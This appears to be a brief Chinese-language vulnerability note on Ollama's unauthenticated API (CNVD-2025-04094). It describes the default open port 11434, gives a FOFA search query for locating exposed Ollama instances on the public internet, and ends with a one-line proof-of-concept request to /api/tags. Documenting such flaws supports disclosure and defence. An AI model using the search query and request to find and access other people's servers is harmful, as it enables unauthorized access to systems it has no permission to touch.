1、产品简介

Ollama 是一款开源跨平台工具，用于本地化部署和管理大语言模型（如 DeepSeek-R1、Llama、Phi-4 等），支持 macOS、Windows、Linux 及 Docker 容器化运行。（默认监听端口 11434）

2、漏洞简介

Ollama 默认未启用身份认证机制，若服务端口暴露于公网，攻击者可远程调用高危接口实现未授权访问（CNVD-2025-04094）。

3.实操

FOFA：app="Ollama" && is_domain=false

4.POC

GET /api/tags HTTP/1.1